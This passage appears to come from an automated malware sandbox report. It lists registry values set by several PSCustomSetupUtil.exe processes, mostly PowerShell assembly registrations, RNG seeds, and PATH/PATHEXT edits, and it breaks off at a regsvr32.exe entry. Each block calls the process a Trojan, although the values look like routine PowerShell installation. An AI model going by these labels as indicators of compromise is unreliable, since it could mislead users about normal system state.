"System.Management.Automation.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "C8 37 0A 98 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "175"
"StoreChangeIDFor32BitProcesses" = "196"
The process PSCustomSetupUtil.exe:3068 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 44 7F F9 85 6B 73 9B B4 5E DD 04 9C C7 F9 1F"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "188"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "20 36 83 96 CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "189"
"StoreChangeIDFor64BitProcesses" = "167"
"StoreChangeIDFor32BitProcesses" = "188"
The process PSCustomSetupUtil.exe:3232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 E5 A3 00 CD FA D7 64 FB 30 99 77 53 8F E0 47"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL" = "54 91 20 97 CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "191"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "192"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "170"
"StoreChangeIDFor32BitProcesses" = "191"
The process PSCustomSetupUtil.exe:2300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 8A 24 2F A4 4B 84 94 4A 64 FC 18 46 CE FC 94"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process PSCustomSetupUtil.exe:2484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A 64 93 21 A2 88 CE E0 39 C7 E8 20 2F AE 7A 4E"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "206"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35,MSIL" = "B8 8D 6F 9C CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "207"
"StoreChangeIDFor64BitProcesses" = "185"
"StoreChangeIDFor32BitProcesses" = "206"
The process PSCustomSetupUtil.exe:2548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 70 61 BC EA 4C C2 B4 54 CC AD E3 BE 21 43 29"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "207"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "A4 EE 90 9C CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "208"
"StoreChangeIDFor64BitProcesses" = "186"
"StoreChangeIDFor32BitProcesses" = "207"
The process PSCustomSetupUtil.exe:3344 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 1C 03 59 21 54 3E 7D AD B8 8E 31 DF 3C EF 7B"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL" = "02 DE 4D 97 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "192"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "193"
"StoreChangeIDFor64BitProcesses" = "171"
"StoreChangeIDFor32BitProcesses" = "192"
The process PSCustomSetupUtil.exe:2388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B 3C E8 65 1E 7D 25 5C FD A3 B7 FA C9 D8 E6 B3"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "1E E0 20 9C CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "204"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "205"
"StoreChangeIDFor64BitProcesses" = "183"
"StoreChangeIDFor32BitProcesses" = "204"
The process PSCustomSetupUtil.exe:2288 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 89 DD 38 F5 EE FB A5 9B 9D D9 F7 F3 36 CE 7C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PATHEXT" = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.PSC1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process PSCustomSetupUtil.exe:3664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 92 7C ED B8 AA D0 3E 5A 3C BF C8 8B 50 D0 36"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "76 84 37 98 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "197"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "198"
"StoreChangeIDFor64BitProcesses" = "176"
"StoreChangeIDFor32BitProcesses" = "197"
The process PSCustomSetupUtil.exe:2600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 F9 A1 08 D2 40 1A E2 2D 60 2F DF 3C BB A0 B8"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "208"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "209"
"Microsoft.PowerShell.Editor.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "EA B1 B4 9C CA AB D1 01"
"StoreChangeIDFor64BitProcesses" = "187"
"StoreChangeIDFor32BitProcesses" = "208"
The process PSCustomSetupUtil.exe:2876 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 54 83 DB FF D0 FA 75 A4 E5 35 3F C6 FF A9 A8"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "22 4E D1 9C CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "210"
"StoreChangeIDFor64BitProcesses" = "188"
"StoreChangeIDFor32BitProcesses" = "209"
The process PSCustomSetupUtil.exe:3884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 41 10 97 6E 7B 2D 09 31 A4 E6 C3 AE E8 A0 C2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "7A F2 E7 98 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "201"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "202"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "180"
"StoreChangeIDFor32BitProcesses" = "201"
The process PSCustomSetupUtil.exe:2284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 87 65 57 5A 97 0C 29 AE 7F 64 96 59 83 7F B8"
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"Path" = "C:\Perl\site\bin;C:\Perl\bin;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;c:\Program Files\Wireshark;%System%\WindowsPowerShell\v1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process PSCustomSetupUtil.exe:3932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA D9 9A 70 5A 35 6B 22 05 AF CB 13 FC D1 63 49"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "74 7A 10 99 CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "202"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "203"
"StoreChangeIDFor64BitProcesses" = "181"
"StoreChangeIDFor32BitProcesses" = "202"
The process PSCustomSetupUtil.exe:2976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 47 D0 E5 05 1D EE E7 50 DF C6 8D D1 A5 6B 0C"
[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL" = "CC 4B 58 96 CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "187"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "188"
"StoreChangeIDFor64BitProcesses" = "166"
"StoreChangeIDFor32BitProcesses" = "187"
The process PSCustomSetupUtil.exe:3704 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD 20 75 8F 8B 32 51 94 35 6A 57 87 78 B3 51 DE"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "70 0C 60 98 CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "198"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "199"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "177"
"StoreChangeIDFor32BitProcesses" = "198"
The process PSCustomSetupUtil.exe:3544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE EC 97 D2 D9 56 79 FC D6 71 F3 32 22 E1 CF 1C"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "C0 88 DA 97 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "195"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "196"
"StoreChangeIDFor64BitProcesses" = "174"
"StoreChangeIDFor32BitProcesses" = "195"
The process PSCustomSetupUtil.exe:3140 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 CA AD A8 FB F2 18 C6 13 5C F5 B3 4D DC AA 0B"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "9E 95 C3 96 CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "189"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "190"
"StoreChangeIDFor64BitProcesses" = "168"
"StoreChangeIDFor32BitProcesses" = "189"
The process PSCustomSetupUtil.exe:3784 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 87 43 FE 6A 9E 0A DC 56 E2 5B FB F1 6D D9 A5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "199"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "200"
"Microsoft.PowerShell.Commands.Utility.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "78 BB 8F 98 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "178"
"StoreChangeIDFor32BitProcesses" = "199"
The process PSCustomSetupUtil.exe:3224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 1B B7 08 25 1C 8C DF 2D 7A E7 F4 F9 56 FE AC"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "190"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL" = "F2 7F EE 96 CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "191"
"StoreChangeIDFor64BitProcesses" = "169"
"StoreChangeIDFor32BitProcesses" = "190"
The process PSCustomSetupUtil.exe:3984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 FB D3 DA 07 EB 27 54 03 B0 CB 62 D9 B8 5E 70"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "22 C7 3D 99 CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "203"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "204"
"StoreChangeIDFor64BitProcesses" = "182"
"StoreChangeIDFor32BitProcesses" = "203"
The process PSCustomSetupUtil.exe:3848 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 82 C9 7F 07 50 C1 DC 02 0B 41 B3 C8 38 A8 D2"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "CC A5 BA 98 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "200"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "201"
"StoreChangeIDFor64BitProcesses" = "179"
"StoreChangeIDFor32BitProcesses" = "200"
The process regsvr32.exe:3056 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
